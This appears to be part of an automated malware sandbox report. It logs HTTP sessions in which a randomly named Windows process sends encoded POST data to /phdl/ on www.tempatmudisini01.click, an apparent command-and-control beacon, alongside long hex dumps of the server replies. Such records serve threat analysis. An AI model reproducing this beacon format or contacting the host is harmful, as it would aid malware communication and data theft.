                                Data Raw: 32 64 31 62 0d 0a f0 d7 2d 8a aa da 0f 11 51 d4 87 00 8d 94 85 f3 f7 47 c8 30 f7 ff fe 52 ff ff db fc 7c ed a8 eb d8 d0 22 21 f0 18 1c 7c a6 31 b7 c3 74 ef 6b b2 b2 64 d8 d8 6a 84 a4 27 09 63 1f ea 3f 5b f5 7a b6 2f a7 57 c6 49 5a 63 89 af a7 0d 50 67 fb 4b b6 75 e2 53 56 81 04 a8 06 10 16 30 4d a7 ab ff 7f 7f 69 96 8b 76 b0 db a6 0b 75 84 8e e4 54 e9 a1 c2 0a ab 6c 75 ef 7b ef 9c fc 81 62 04 c5 08 8a 91 14 30 15 92 ed 42 86 fb ee 83 ff e7 0f 78 04 5e c9 8c 2b c9 44 85 36 f6 02 61 9b 32 b5 e3 d5 02 50 15 68 6a 85 47 bb c1 2e 65 8a 12 1f c3 b4 66 fb db f5 de 04 11 11 15 91 bc 0f 99 99 b6 b5 eb 3a 7e 78 86 00 89 59 92 80 9e 8d 12 30 f7 2e ba 3b 86 4e 1d bd ea d0 15 41 4d 3f be 5f c7 41 df d3 e2 c2 f5 51 38 8f a1 22 39 9f 1f e5 81 14 96 08 21 47 6e 45 3d af 8a ba 22 85 0d bd 77 a3 be 16 0a ab 1c 17 7d 5b 68 e6 cc de 04 3f fb 38 de ac 13 67 2a 3b 71 40 ba 59 f5 c1 38 94 e7 a3 18 cc 02 3f 9c 20 83 c2 dd 1b 71 40 d0 26 c0 01 b2 de fe e9 8b 4d 91 e7 5b 38 86 60 7d 99 65 01 3b 2b 42 d7 37 d2 4b 2d 79 ce b6 [TRUNCATED]
                                Data Ascii: 2d1b-QG0R|"!|1tkdj'c?[z/WIZcPgKuSV0MivuTlu{b0Bx^+D6a2PhjG.ef:~xY0.;NAM?_AQ8"9!GnE="w}[h?8g*;q@Y8? q@&M[8`}e;+B7K-yOv;%38TZB}Ax=ZitssmoeYdgu'PFi.:?4XWCN2>dg3*M62/C/gl]CFR@JrCJ3O6:.$I9Zf"g>d@!gBw:T(<NjBWzF}6\+ `^f?T'I80Oq;1&cpk"nLa^qrz^>'<?vIz?'A8$RnW~^cRN}-abY-IxV_Yr*IRxqHym"5Q0/~tN\bd
                                Sep 23, 2024 14:37:14.218050957 CEST1236INData Raw: 07 0c 7f 76 e2 80 bf 88 20 d0 3f 44 b1 46 04 91 a4 ae 8a e9 3a 4b 57 45 4a 91 6a 66 2a 02 bb 70 03 fa 5a 41 2d 98 86 66 ef 64 00 ab aa 72 5f c2 e3 35 61 f2 e4 fe ba f9 41 86 fa 18 87 64 ac 85 47 d2 2a 71 20 65 e0 7b 43 c7 98 92 87 be d9 cc eb 87
                                Data Ascii: v ?DF:KWEJjf*pZA-fdr_5aAdG*q e{CiC"o/Vb=8$M+,FDhitpv7zg,S^@ps\LyY"nIZvob{x>b9?=I8pcCnphZl36S
                                Sep 23, 2024 14:37:14.218090057 CEST1236INData Raw: 03 67 54 c8 60 cc c5 34 3d ae f6 21 cb 93 70 31 0d 24 89 84 9c 4e a6 56 a4 3e 92 ed 68 b6 e0 69 6a 5b 66 4e a2 55 78 de b6 0a cf d4 d2 6a 85 5f 41 91 38 20 f4 fa 0d 4e d8 80 c7 1b 9c b0 e9 e0 84 4d b6 bb 9c 6c 6e 2f d4 00 66 f7 23 60 55 4c a5 5c
                                Data Ascii: gT`4=!p1$NV>hij[fNUxj_A8 NMln/f#`UL\Dl$V,(q-.\Yr #g=fpm3TFrDH}4SOy1VZ~Y9+A%vW2H5QRhg|,pr9kTb2;w:UQUQa~
                                Sep 23, 2024 14:37:14.218122959 CEST672INData Raw: 25 57 2f b3 9a fc 88 a2 2b 8a 8e 69 a1 28 f2 f4 c1 23 b2 ac 3b 41 86 7a 24 a3 87 96 34 6b a5 5b 8d 83 99 0b 4f 1d 50 3c e4 7c 54 5e 52 74 73 c3 e4 37 b5 20 4b f0 98 a0 7d 08 2c 4e 55 7d 82 16 3c 37 71 31 36 09 a2 22 b5 b0 8e cb 6a f2 9f 63 61 cf
                                Data Ascii: %W/+i(#;Az$4k[OP<|T^Rts7 K},NU}<7q16"jcatHVKpwu',pk)MY&|l4"*nEU+E/wQ4[~Mw!kE`RK`\sEYqC+S%(_Jbm\ a1Ht:<`i/g
                                Sep 23, 2024 14:37:14.218157053 CEST1236INData Raw: 62 c6 1b 89 92 7b 27 dc a5 b1 06 73 67 30 8e 0b 31 87 ca 9c 4f 0f 87 55 0c b7 1f 86 17 9c af eb bd d8 82 3c 9e 28 75 87 7d c9 d3 bc 58 a4 f9 66 05 f9 c4 6b 84 7b 46 47 73 5e be e0 7c b5 17 f9 b7 42 be 43 7c 9d e6 ab 30 41 31 6d d8 52 6c d6 af 72
                                Data Ascii: b{'sg01OU<(u}Xfk{FGs^|BC|0A1mRlr|DtANjo+{FL5!ky`\E(jV9Emt/29[s+&1n$BPNx*[KbiAvlKlcGhX{Bqoo#(
                                Sep 23, 2024 14:37:14.218189955 CEST1236INData Raw: 2e 2d 14 be 36 28 bb db 18 57 16 8a 16 3b ed d4 ed 4c bd 56 dd fa 16 a3 ec 08 f1 39 4c ba cf 32 1b 6d ba 7d bf c4 e5 a1 75 17 43 51 55 54 88 8a 22 01 fe 23 9a 87 f6 82 5a d3 1a a9 10 8a 00 72 fe 23 12 3d 2b e7 e4 a1 c9 be 25 0d 27 bc a0 10 54 08
                                Data Ascii: .-6(W;LV9L2m}uCQUT"#Zr#=+%'TNoGSkr=rKRN]kM9+s5E9-h^[WTk jD6#b(6:+FR=9UT XjtYSD$e`33kVS_Bb
                                Sep 23, 2024 14:37:14.218224049 CEST1236INData Raw: 2a 71 be 2c de 5c 64 9b 11 f8 39 bc 08 30 e4 34 8e 8f 67 2d a0 ee 16 73 5d de 14 16 5f 27 58 e2 14 ab 3a cb a3 c4 b6 41 ef 82 a4 5f 93 7b 23 24 18 eb 41 84 1b 34 b8 35 01 c2 fb 43 72 c0 20 65 1a c5 f9 8f e4 aa 1f 47 3c 84 e8 82 0f 8e b9 21 89 79
                                Data Ascii: *q,\d904g-s]_'X:A_{#$A45Cr eG<!yd?L!.rdO$,rC^GnXDR/@*)f#fY$+VRh"!^<oxJ1srI&mhq q$df"=YC7\"UJw$A4
                                Sep 23, 2024 14:37:14.218255997 CEST1236INData Raw: 2b 32 f2 5f b9 72 82 6f e2 a0 73 47 e7 f0 d0 72 ee 49 6d c4 cd 98 f7 59 75 81 0e 11 49 6f be 39 62 2b da 28 b4 1e d2 e3 06 45 93 17 26 bc 5c 3b 4e 87 18 d7 1c fd 30 71 cb dc 9f 3a bc 38 6f ee a1 6d 0a a7 f8 b6 27 74 78 2c 30 80 b4 f3 37 d9 f6 87
                                Data Ascii: +2_rosGrImYuIo9b+(E&\;N0q:8om'tx,07OD36?7LP&p&yFqr,>S(tB@YWj,@N5U*SuUS*h7j .tPI4*7%xEsB-|k\h3
                                Sep 23, 2024 14:37:14.218290091 CEST1236INData Raw: b0 f4 ab 37 da f0 4a 6a 0b e6 21 ff da c8 f0 f1 dd 9f e4 f5 b3 9b 95 f1 ee fd 2f 46 54 3e 8a e7 4e 39 5b 33 7b b4 df 3b df 18 ce 99 24 36 40 ea 56 85 5e c0 67 e3 9a 37 0e bd 07 0b 22 23 60 78 e5 b5 04 d9 54 64 b0 54 19 d1 50 6b d4 a5 95 4a d1 83
                                Data Ascii: 7Jj!/FT>N9[3{;$6@V^g7"#`xTdTPkJw]y^,R[^N9H7lA680*n`wcg!;nf9emXAvF3x3in`Mdm.dO0X?dCa|/5X_;4BUHuKq8!T
                                Sep 23, 2024 14:37:14.218341112 CEST1236INData Raw: 39 db a8 15 cb e9 8a cd 69 4e 73 ba 62 39 ac 58 41 d7 bf 4f 41 73 c8 e1 02 e6 74 c5 96 b0 62 6b 98 de 67 49 57 6c 05 8f f1 0a 72 9a ff 4b 76 77 99 15 e1 b8 f7 7b 8d 9d b4 a0 07 15 00 2e 82 f1 3b 24 64 34 1d bf 49 e7 db 92 60 bf d0 92 0e 05 4d 21
                                Data Ascii: 9iNsb9XAOAstbkgIWlrKvw{.;$d4I`M!I2FOF+G7=IQv`,jj4D'(9A!e`#x6N^tVOo-JCEUV+wiQPT[#G5VN5]EwPW=YVV0G#Xrp
                                Sep 23, 2024 14:37:14.222953081 CEST256INData Raw: 75 c0 06 1e ad 84 4b db e3 41 6a 2d f5 01 4c 0b 32 b8 6f cc 22 ba ad d9 c4 8d 18 03 5d 3d 8c 3c c8 85 23 42 cf 7c 71 94 6a 35 18 84 3f 7f 34 8d 7c e1 af 0d dd 91 8c 64 8e a7 9b cd 3c fc f9 cb e3 ae 20 fa e6 ec 1f c1 68 04 d9 c2 83 8c 50 af 67 47
                                Data Ascii: uKAj-L2o"]=<#B|qj5?4|d< hPgGd`Q8Wg:8@3zJt&{~bTf"@K<Na:f) *+O?KlR8Ma$ ),g&C:G"i&8A[;


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                2192.168.2.749705103.21.221.4803040C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                TimestampBytes transferredDirectionData
                                Sep 23, 2024 14:37:15.490607023 CEST790OUTPOST /phdl/ HTTP/1.1
                                Host: www.tempatmudisini01.click
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Accept-Encoding: gzip, deflate, br
                                Origin: http://www.tempatmudisini01.click
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: max-age=0
                                Content-Length: 235
                                Connection: close
                                Referer: http://www.tempatmudisini01.click/phdl/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Data Raw: 37 36 3d 63 59 30 74 50 74 6e 51 4a 2b 2f 32 61 37 61 45 37 2f 6b 32 54 46 4b 6a 4e 44 69 68 64 43 38 34 37 4b 72 71 63 5a 37 67 66 4d 4a 67 73 69 34 36 32 54 4d 77 7a 77 6e 30 33 56 7a 57 73 57 39 4d 71 42 46 32 75 61 75 43 78 74 62 43 2f 36 67 73 45 34 32 5a 68 4e 51 51 68 57 5a 59 38 41 30 58 49 6a 41 4c 34 75 36 39 67 74 36 52 50 46 37 64 73 79 51 63 4e 63 37 47 73 59 32 54 6f 43 71 73 2b 65 32 59 53 5a 65 73 43 39 66 52 45 4a 47 39 33 69 4d 33 6c 6a 55 39 76 34 6d 72 44 47 4b 42 59 57 79 43 55 4d 46 6a 70 41 75 78 70 2f 70 53 57 4a 59 49 73 77 49 31 4d 56 4a 7a 4b 49 66 53 39 6e 32 70 78 49 56 53 43 58 48 31 43 47 73 4a 57 61 54 6c 49 2b 4c 4d 63 39 6b 38 53 59 6b 53 78 58 37 6b 51 4c 34 3d
                                Data Ascii: 76=cY0tPtnQJ+/2a7aE7/k2TFKjNDihdC847KrqcZ7gfMJgsi462TMwzwn03VzWsW9MqBF2uauCxtbC/6gsE42ZhNQQhWZY8A0XIjAL4u69gt6RPF7dsyQcNc7GsY2ToCqs+e2YSZesC9fREJG93iM3ljU9v4mrDGKBYWyCUMFjpAuxp/pSWJYIswI1MVJzKIfS9n2pxIVSCXH1CGsJWaTlI+LMc9k8SYkSxX7kQL4=
                                Sep 23, 2024 14:37:16.852230072 CEST1236INHTTP/1.1 404 Not Found
                                Connection: close
                                x-powered-by: PHP/7.4.33
                                x-litespeed-tag: 894_HTTP.404
                                expires: Wed, 11 Jan 1984 05:00:00 GMT
                                content-type: text/html; charset=UTF-8
                                link: <https://tempatmudisini01.click/wp-json/>; rel="https://api.w.org/"
                                x-litespeed-cache-control: no-cache
                                cache-control: no-cache, no-store, must-revalidate, max-age=0
                                transfer-encoding: chunked
                                content-encoding: br
                                vary: Accept-Encoding
                                date: Mon, 23 Sep 2024 12:37:16 GMT
                                server: LiteSpeed
                                Data Raw: 32 64 31 62 0d 0a f0 d7 2d 8a aa da 0f 11 51 d4 87 00 8d 94 85 f3 f7 47 c8 30 f7 ff fe 52 ff ff db fc 7c ed a8 eb d8 d0 22 21 f0 18 1c 7c a6 31 b7 c3 74 ef 6b b2 b2 64 d8 d8 6a 84 a4 27 09 63 1f ea 3f 5b f5 7a b6 2f a7 57 c6 49 5a 63 89 af a7 0d 50 67 fb 4b b6 75 e2 53 56 81 04 a8 06 10 16 30 4d a7 ab ff 7f 7f 69 96 8b 76 b0 db a6 0b 75 84 8e e4 54 e9 a1 c2 0a ab 6c 75 ef 7b ef 9c fc 81 62 04 c5 08 8a 91 14 30 15 92 ed 42 86 fb ee 83 ff e7 0f 78 04 5e c9 8c 2b c9 44 85 36 f6 02 61 9b 32 b5 e3 d5 02 50 15 68 6a 85 47 bb c1 2e 65 8a 12 1f c3 b4 66 fb db f5 de 04 11 11 15 91 bc 0f 99 99 b6 b5 eb 3a 7e 78 86 00 89 59 92 80 9e 8d 12 30 f7 2e ba 3b 86 4e 1d bd ea d0 15 41 4d 3f be 5f c7 41 df d3 e2 c2 f5 51 38 8f a1 22 39 9f 1f e5 81 14 96 08 21 47 6e 45 3d af 8a ba 22 85 0d bd 77 a3 be 16 0a ab 1c 17 7d 5b 68 e6 cc de 04 3f fb 38 de ac 13 67 2a 3b 71 40 ba 59 f5 c1 38 94 e7 a3 18 cc 02 3f 9c 20 83 c2 dd 1b 71 40 d0 26 c0 01 b2 de fe e9 8b 4d 91 e7 5b 38 86 60 7d 99 65 01 3b 2b 42 d7 37 d2 4b 2d 79 ce b6 [TRUNCATED]
                                Data Ascii: 2d1b-QG0R|"!|1tkdj'c?[z/WIZcPgKuSV0MivuTlu{b0Bx^+D6a2PhjG.ef:~xY0.;NAM?_AQ8"9!GnE="w}[h?8g*;q@Y8? q@&M[8`}e;+B7K-yOv;%38TZB}Ax=ZitssmoeYdgu'PFi.:?4XWCN2>dg3*M62/C/gl]CFR@JrCJ3O6:.$I9Zf"g>d@!gBw:T(<NjBWzF}6\+ `^f?T'I80Oq;1&cpk"nLa^qrz^>'<?vIz?'A8$RnW~^cRN}-abY-IxV_Yr*IRxqHym"5Q0/~tN\bd
                                Sep 23, 2024 14:37:16.852261066 CEST1236INData Raw: 07 0c 7f 76 e2 80 bf 88 20 d0 3f 44 b1 46 04 91 a4 ae 8a e9 3a 4b 57 45 4a 91 6a 66 2a 02 bb 70 03 fa 5a 41 2d 98 86 66 ef 64 00 ab aa 72 5f c2 e3 35 61 f2 e4 fe ba f9 41 86 fa 18 87 64 ac 85 47 d2 2a 71 20 65 e0 7b 43 c7 98 92 87 be d9 cc eb 87
                                Data Ascii: v ?DF:KWEJjf*pZA-fdr_5aAdG*q e{CiC"o/Vb=8$M+,FDhitpv7zg,S^@ps\LyY"nIZvob{x>b9?=I8pcCnphZl36S
                                Sep 23, 2024 14:37:16.852271080 CEST1236INData Raw: 03 67 54 c8 60 cc c5 34 3d ae f6 21 cb 93 70 31 0d 24 89 84 9c 4e a6 56 a4 3e 92 ed 68 b6 e0 69 6a 5b 66 4e a2 55 78 de b6 0a cf d4 d2 6a 85 5f 41 91 38 20 f4 fa 0d 4e d8 80 c7 1b 9c b0 e9 e0 84 4d b6 bb 9c 6c 6e 2f d4 00 66 f7 23 60 55 4c a5 5c
                                Data Ascii: gT`4=!p1$NV>hij[fNUxj_A8 NMln/f#`UL\Dl$V,(q-.\Yr #g=fpm3TFrDH}4SOy1VZ~Y9+A%vW2H5QRhg|,pr9kTb2;w:UQUQa~
                                Sep 23, 2024 14:37:16.852348089 CEST1236INData Raw: 25 57 2f b3 9a fc 88 a2 2b 8a 8e 69 a1 28 f2 f4 c1 23 b2 ac 3b 41 86 7a 24 a3 87 96 34 6b a5 5b 8d 83 99 0b 4f 1d 50 3c e4 7c 54 5e 52 74 73 c3 e4 37 b5 20 4b f0 98 a0 7d 08 2c 4e 55 7d 82 16 3c 37 71 31 36 09 a2 22 b5 b0 8e cb 6a f2 9f 63 61 cf
                                Data Ascii: %W/+i(#;Az$4k[OP<|T^Rts7 K},NU}<7q16"jcatHVKpwu',pk)MY&|l4"*nEU+E/wQ4[~Mw!kE`RK`\sEYqC+S%(_Jbm\ a1Ht:<`i/g
                                Sep 23, 2024 14:37:16.852440119 CEST1236INData Raw: 53 0c 9e 26 9c 45 5c ea 34 3d 94 0d 24 52 8b 33 49 30 99 64 36 0e 4c 0e a2 e0 22 01 25 93 0d 03 e3 fe 79 ec ca c5 f1 61 75 88 ba 67 b9 a6 cc 4c 96 83 f3 83 cd c2 bc f8 b0 f9 b5 9b e2 6a 73 e8 f6 0b ae 27 fd bb 82 5c 7d 4a 8e 13 97 2d ec 17 cd 7f
                                Data Ascii: S&E\4=$R3I0d6L"%yaugLjs'\}J-D\n4Moz^Dm]jaG!c,F!4y;&<+D\@[0W0*-Kdo\O@5xN=0E!Ws;LpD}M]hP2{=$
                                Sep 23, 2024 14:37:16.852446079 CEST1236INData Raw: c1 f7 1b 30 e0 a5 c8 61 26 f0 02 bc ac 4c 45 28 60 59 eb 1c 66 7a 63 cf 18 20 90 0a 6d 7e 79 00 61 c9 6b 49 28 88 f2 8d 9b 30 90 0c 6c 83 ff 2c b1 5e b2 14 d5 3b ba da 3e 3c c6 da e4 ef 16 be f9 dd b2 87 fc 0d 85 0d 66 5a 07 14 ab b9 ed 6e 0b 9f
                                Data Ascii: 0a&LE(`Yfzc m~yakI(0l,^;><fZn]Zos:Q4O{wNN%fX2R0]3+_;"wuOue7S'4suviR~2/9E!"KuKz
                                Sep 23, 2024 14:37:16.852452993 CEST1236INData Raw: e7 95 9f dc 46 80 17 3e 0b 9e 21 17 2d ab b7 29 6a 19 97 ac 69 b0 3a ab 2c cd 36 53 64 c7 35 0f e7 ab 1a 89 01 c7 1a 08 ac 5a 36 85 d9 25 53 b1 2a b0 ca 5a 59 51 f8 ce e0 95 ca 04 c9 cc f3 84 89 76 cb 2d 65 e0 de 6b 37 81 f3 ef 6f 99 49 6c 12 c1
                                Data Ascii: F>!-)ji:,6Sd5Z6%S*ZYQv-ek7oIlA$pr@u{|Brf:=->&s:9bjT'@.0G41Q/hT'GGa+Hjo0c;5aI('S M1|$SgCUz^CX
                                Sep 23, 2024 14:37:16.852458954 CEST1236INData Raw: 98 a7 34 c4 25 1d bb 7b d9 3f 01 15 9d 4e e3 a5 31 55 87 96 16 b1 9e dd 32 4c ba 10 ed 49 d4 ae e0 bc f1 8e a3 f0 bf ff 5d 73 e8 e3 29 73 6d f5 34 e3 87 23 e4 fb ee dc ba ad 2e 23 c2 ce 1c f2 c4 b6 8b ed 00 b4 a4 3d dc 55 b1 12 15 49 b0 b7 61 af
                                Data Ascii: 4%{?N1U2LI]s)sm4#.#=UIaP\[X=AbN'i&]D(A~fQx!CP}dBA{:%Q7<ar?EUKvXOz'}`xtaB,Ry*/;rnO<6H[_}M;}
                                Sep 23, 2024 14:37:16.852621078 CEST1236INData Raw: 0b 6e cf 64 17 4d a2 09 49 0d d2 87 ad d4 92 8a e5 9b 7c 5a 8b a1 d8 c3 68 80 8e f5 a2 22 17 a4 65 5b 85 58 2e f7 24 9a bc f9 f5 b6 b6 45 66 12 fd a3 3c 13 df bf 50 33 d4 38 7f b7 19 22 13 73 8d 15 ae e4 48 ab 76 76 89 0e 45 55 d3 19 f7 cc f0 a8
                                Data Ascii: ndMI|Zh"e[X.$Ef<P38"sHvvEUZR!r,+DC(9(53likXr6`i&v3[R@J7sSTs(P)n!M&`AX,ACcEj 4kvl$Nk.vC,VByLfjh/xMIX$%IJ
                                Sep 23, 2024 14:37:16.852627993 CEST917INData Raw: 3d 34 2c 63 e8 26 8a 6d 91 d6 60 aa e6 39 ff ae 91 c5 aa 98 81 e1 17 91 36 14 79 6e e5 a9 f5 1a 5a 32 5c 5a 5c 2c f6 c9 df 94 66 18 07 34 03 d1 39 a2 10 f4 69 73 f4 24 94 36 9e 71 11 19 26 15 bf 39 1e 97 69 19 03 c7 5f 8b e7 79 90 2f 62 67 69 13
                                Data Ascii: =4,c&m`96ynZ2\Z\,f49is$6q&9i_y/bgi]h/8G''qPjO@88'Q1)nC+5BZ)w}Gz`Kl!U&<*p!zLU-n956@F&2^^=t>EU~
                                Sep 23, 2024 14:37:16.852647066 CEST11INData Raw: 31 0d 0a 03 0d 0a 30 0d 0a 0d 0a
                                Data Ascii: 10


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                3192.168.2.749707103.21.221.4803040C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                TimestampBytes transferredDirectionData
                                Sep 23, 2024 14:37:18.036112070 CEST1803OUTPOST /phdl/ HTTP/1.1
                                Host: www.tempatmudisini01.click
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Accept-Encoding: gzip, deflate, br
                                Origin: http://www.tempatmudisini01.click
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: max-age=0
                                Content-Length: 1247
                                Connection: close
                                Referer: http://www.tempatmudisini01.click/phdl/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Data Raw: 37 36 3d 63 59 30 74 50 74 6e 51 4a 2b 2f 32 61 37 61 45 37 2f 6b 32 54 46 4b 6a 4e 44 69 68 64 43 38 34 37 4b 72 71 63 5a 37 67 66 50 70 67 73 55 45 36 6b 45 59 77 79 77 6e 30 34 46 7a 62 73 57 39 72 71 46 70 79 75 61 71 30 78 6f 66 43 74 76 30 73 47 4a 32 5a 75 4e 51 51 38 47 5a 49 79 67 30 4f 49 6a 51 48 34 71 6d 39 67 74 36 52 50 48 6a 64 6c 47 6b 63 50 63 36 30 72 59 32 58 73 43 71 49 2b 65 76 6e 53 61 7a 5a 43 4e 2f 52 46 74 69 39 77 51 55 33 2f 6a 55 2f 73 34 6e 74 44 47 47 6b 59 57 47 67 55 4d 5a 64 70 44 4f 78 71 5a 73 58 44 6f 46 52 34 42 77 71 50 47 46 2b 48 6f 62 42 2f 6b 2b 56 36 71 56 42 4d 31 6d 4a 62 33 4d 69 51 73 61 6d 4b 75 76 6a 56 38 38 5a 61 4f 78 70 71 6d 33 48 4c 50 56 72 6d 34 2b 67 35 46 37 54 33 4d 59 44 2f 6a 63 64 4c 6c 53 52 35 49 51 5a 79 74 65 55 33 33 63 6d 73 59 76 32 31 55 76 32 79 54 70 37 56 56 33 4c 51 4f 74 69 58 76 78 67 75 56 47 5a 62 74 4e 50 34 68 32 67 64 72 51 68 4a 37 65 51 71 48 35 78 68 4c 6e 2f 2f 30 62 6b 69 6d 6e 35 4b 4d 49 6b 66 67 65 67 45 47 72 [TRUNCATED]
                                Data Ascii: 76=cY0tPtnQJ+/2a7aE7/k2TFKjNDihdC847KrqcZ7gfPpgsUE6kEYwywn04FzbsW9rqFpyuaq0xofCtv0sGJ2ZuNQQ8GZIyg0OIjQH4qm9gt6RPHjdlGkcPc60rY2XsCqI+evnSazZCN/RFti9wQU3/jU/s4ntDGGkYWGgUMZdpDOxqZsXDoFR4BwqPGF+HobB/k+V6qVBM1mJb3MiQsamKuvjV88ZaOxpqm3HLPVrm4+g5F7T3MYD/jcdLlSR5IQZyteU33cmsYv21Uv2yTp7VV3LQOtiXvxguVGZbtNP4h2gdrQhJ7eQqH5xhLn//0bkimn5KMIkfgegEGrQs/9sDQ/oKRwvV7HkS9oFhd83v/22SUkhsy2dvRR/BfxZi8p1CRCp/DAD0VWHqNdK7Rb0ME7PnUOzlPsC4l/s4RuzFnsL9+UtLLOqb0jzMnXNoVTpTDfyfJ97aI5D8Cx5x6sdPs88f/Ak4ho0JJrvEIj8RKK0JC1vGkTOmIQJrKlMsLT4CRRq4yGCtBxfdgrPj9nNKKsvnxzXkdaG+L9EMaUNhnxMRWsjmO6NjweqTmGXOjR2C0PbtlVSO5+oPuuxPIJm4t7X13c1nleSyu720Pd8b1DFnAmxYZQDiTKD0KazxETaItx9AGn2+goEA7VyaL/iq3rf+aLLKVwTPwmTlcjJG2m8l+92f6NwZzOcckvzwbafF9tp4fpZWrQ7rJTwDKXLROPAZoKrPuLCOwtJ5KBwHTbvxhwEgmyrjRBIvoWEngAg6b+hEdAsCXscC3ugBolZecwbqwn92srzUoPG7nBotSwj9IA2GBDcAgV3gkxOo9CafAWHhQeBGcvibeW3ATY21xSbsIEFCJMEXMd5ZWMM57sEmObmyzWDXHCSFQ/sbU+aKMmSuJNz6qpjU/2/jDcERoRQdGoNAVH6+J7uP55v5WXv0faigfn4yQUgALaBdrO+6Ulj3VUAtsxgBuiqTPnPv5iK5wlFzYMTB7sEv0v5wCr14biN/ [TRUNCATED]
                                Sep 23, 2024 14:37:19.355966091 CEST1236INHTTP/1.1 404 Not Found
                                Connection: close
                                x-powered-by: PHP/7.4.33
                                x-litespeed-tag: 894_HTTP.404
                                expires: Wed, 11 Jan 1984 05:00:00 GMT
                                content-type: text/html; charset=UTF-8
                                link: <https://tempatmudisini01.click/wp-json/>; rel="https://api.w.org/"
                                x-litespeed-cache-control: no-cache
                                cache-control: no-cache, no-store, must-revalidate, max-age=0
                                content-length: 11547
                                content-encoding: br
                                vary: Accept-Encoding
                                date: Mon, 23 Sep 2024 12:37:19 GMT
                                server: LiteSpeed
                                Data Raw: e2 af 3b 8a aa da 0f 11 51 d4 87 00 8d 94 85 f3 f7 47 c8 30 f7 ff fe 52 ff ff db fc 7c ed a8 eb d8 d0 22 21 f0 18 1c 7c a6 31 b7 c3 74 ef 6b b2 b2 64 d8 d8 6a 84 a4 27 09 63 1f ea 3f 5b f5 7a b6 2f a7 57 c6 49 5a 63 89 af a7 0d 50 67 fb 4b b6 75 e2 53 56 81 04 a8 06 10 16 30 4d a7 ab ff 7f 7f 69 96 8b 76 b0 db a6 0b 75 84 8e e4 54 e9 a1 c2 0a ab 6c 75 ef 7b ef 9c fc 81 62 04 c5 08 8a 91 14 30 15 92 ed 42 86 fb ee 83 ff e7 0f 78 04 5e c9 8c 2b c9 44 85 36 f6 02 61 9b 32 b5 e3 d5 02 50 15 68 6a 85 47 bb c1 2e 65 8a 12 1f c3 b4 66 fb db f5 de 04 11 11 15 91 bc 0f 99 99 b6 b5 eb 3a 7e 78 86 00 89 59 92 80 9e 8d 12 30 f7 2e ba 3b 86 4e 1d bd ea d0 15 41 4d 3f be 5f c7 41 df d3 e2 c2 f5 51 38 8f a1 22 39 9f 1f e5 81 14 96 08 21 47 6e 45 3d af 8a ba 22 85 0d bd 77 a3 be 16 0a ab 1c 17 7d 5b 68 e6 cc de 04 3f fb 38 de ac 13 67 2a 3b 71 40 ba 59 f5 c1 38 94 e7 a3 18 cc 02 3f 9c 20 83 c2 dd 1b 71 40 d0 26 c0 01 b2 de fe e9 8b 4d 91 e7 5b 38 86 60 7d 99 65 01 3b 2b 42 d7 37 d2 4b 2d 79 ce b6 b1 4f 76 84 f6 b0 [TRUNCATED]
                                Data Ascii: ;QG0R|"!|1tkdj'c?[z/WIZcPgKuSV0MivuTlu{b0Bx^+D6a2PhjG.ef:~xY0.;NAM?_AQ8"9!GnE="w}[h?8g*;q@Y8? q@&M[8`}e;+B7K-yOv;%38TZB}Ax=ZitssmoeYdgu'PFi.:?4XWCN2>dg3*M62/C/gl]CFR@JrCJ3O6:.$I9Zf"g>d@!gBw:T(<NjBWzF}6\+ `^f?T'I80Oq;1&cpk"nLa^qrz^>'<?vIz?'A8$RnW~^cRN}-abY-IxV_Yr*IRxqHym"5Q0/~tN\bdv ?
                                Sep 23, 2024 14:37:19.355983973 CEST1236INData Raw: 44 b1 46 04 91 a4 ae 8a e9 3a 4b 57 45 4a 91 6a 66 2a 02 bb 70 03 fa 5a 41 2d 98 86 66 ef 64 00 ab aa 72 5f c2 e3 35 61 f2 e4 fe ba f9 41 86 fa 18 87 64 ac 85 47 d2 2a 71 20 65 e0 7b 43 c7 98 92 87 be d9 cc eb 87 be 69 db f9 43 df 22 6f 1f fa 82
                                Data Ascii: DF:KWEJjf*pZA-fdr_5aAdG*q e{CiC"o/Vb=8$M+,FDhitpv7zg,S^@ps\LyY"nIZvob{x>b9?=I8pcCnphZl36S}
                                Sep 23, 2024 14:37:19.355998039 CEST1236INData Raw: 21 cb 93 70 31 0d 24 89 84 9c 4e a6 56 a4 3e 92 ed 68 b6 e0 69 6a 5b 66 4e a2 55 78 de b6 0a cf d4 d2 6a 85 5f 41 91 38 20 f4 fa 0d 4e d8 80 c7 1b 9c b0 e9 e0 84 4d b6 bb 9c 6c 6e 2f d4 00 66 f7 23 60 55 4c a5 5c b9 44 b1 6c 97 0c d8 8d 09 d7 24
                                Data Ascii: !p1$NV>hij[fNUxj_A8 NMln/f#`UL\Dl$V,(q-.\Yr #g=fpm3TFrDH}4SOy1VZ~Y9+A%vW2H5QRhg|,pr9kTb2;w:UQUQa~X
                                Sep 23, 2024 14:37:19.356062889 CEST1236INData Raw: 69 a1 28 f2 f4 c1 23 b2 ac 3b 41 86 7a 24 a3 87 96 34 6b a5 5b 8d 83 99 0b 4f 1d 50 3c e4 7c 54 5e 52 74 73 c3 e4 37 b5 20 4b f0 98 a0 7d 08 2c 4e 55 7d 82 16 3c 37 71 31 36 09 a2 22 b5 b0 8e cb 6a f2 9f 63 61 cf 74 b8 48 94 56 e1 4b 83 70 9a 13
